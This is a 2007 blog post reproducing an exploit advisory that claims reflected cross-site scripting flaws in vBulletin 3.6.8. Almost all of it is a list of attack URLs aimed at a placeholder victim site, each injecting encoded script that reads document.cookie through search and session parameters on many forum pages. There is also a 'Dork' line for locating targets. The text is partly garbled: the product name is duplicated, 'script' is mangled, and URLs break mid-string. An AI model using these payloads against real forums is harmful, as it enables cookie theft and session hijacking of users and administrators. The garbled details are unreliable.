Friday, August 24, 2007

vBulletin V3.6.8 XSS Password Md5 Hash

#Discovred By : Hasadya Raed
----------------
#Contact : RaeD (at) BsdMail (dot) Cpm [email concealed]
----------------
#s*ript: vBulletin V3.6.8ulletin V3.6.8
----------------
#Dork: vBulletin V3.6.8ulletin V3.6.8
----------------
#Exploit :

http://www.Victim.com/vBulletin V3.6.8ulletin V3.6.8/faq.php?s=&do=search&q=%22%3E%3C%2Fs*ript%3E%3Cs*ript%3Ealert%28d
ocument.cookie%29%3B%3C%2Fs*ript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8ulletin V3.6.8/member.php?u=1=s'&do=search&q=%22%3E%3C%2Fs*ript%3E%3Cs*ript%3Eal
ert%28document.cookie%29%3B%3C%2Fs*ript&match=all&titlesonly=1

http://www.Victim.com/vBulletin V3.6.8/index.php?s=alert('document.cookie')

http://www.Victim.com/vBulletin V3.6.8/faq.php?s="&do=search&q=%22%3E%3C%2Fs*ript%3E%3Cs*ript%3Ealert%28
document.cookie%29%3B%3C%2Fs*ript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/memberlist.php?s="&do=search&q=%22%3E%3C%2Fs*ript%3E%3Cs*ript%3Ea
lert%28document.cookie%29%3B%3C%2Fs*ript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/calendar.php?s="&do=search&q=%22%3E%3C%2Fs*ript%3E%3Cs*ript%3Eale
rt%28document.cookie%29%3B%3C%2Fs*ript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/search.php?s="&do=search&q=%22%3E%3C%2Fs*ript%3E%3Cs*ript%3Ealert
%28document.cookie%29%3B%3C%2Fs*ript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/search.php?do=getdaily"&do=search&q=%22%3E%3C%2Fs*ript%3E%3Cscrip
t%3Ealert%28document.cookie%29%3B%3C%2Fs*ript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fs*ript%3E%3Cs*ript%3
Ealert%28document.cookie%29%3B%3C%2Fs*ript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?do=markread"&do=search&q=%22%3E%3C%2Fs*ript%3E%3
Cs*ript%3Ealert%28document.cookie%29%3B%3C%2Fs*ript&match=all&titlesonly
=0

http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fs*ript%3E%3Cs*ript%3
Ealert%28document.cookie%29%3B%3C%2Fs*ript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?f=1"&do=search&q=%22%3E%3C%2Fs*ript%3E%3Cs*ript%
3Ealert%28document.cookie%29%3B%3C%2Fs*ript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fs*ript%3E%3Cs*ript%3
Ealert%28document.cookie%29%3B%3C%2Fs*ript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?f=2"&do=search&q=%22%3E%3C%2Fs*ript%3E%3Cs*ript%
3Ealert%28document.cookie%29%3B%3C%2Fs*ript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/showgroups.php?s="&do=search&q=%22%3E%3C%2Fs*ript%3E%3Cs*ript%3Ea
lert%28document.cookie%29%3B%3C%2Fs*ript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/online.php?s="&do=search&q=%22%3E%3C%2Fs*ript%3E%3Cs*ript%3Ealert
%28document.cookie%29%3B%3C%2Fs*ript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/member.php?s="&do=search&q=%22%3E%3C%2Fs*ript%3E%3Cs*ript%3Ealert
%28document.cookie%29%3B%3C%2Fs*ript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/sendmessage.php?s="&do=search&q=%22%3E%3C%2Fs*ript%3E%3Cs*ript%3E
alert%28document.cookie%29%3B%3C%2Fs*ript&match=all&titlesonly=0

Sender SecreT Time: 6:24 AM

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)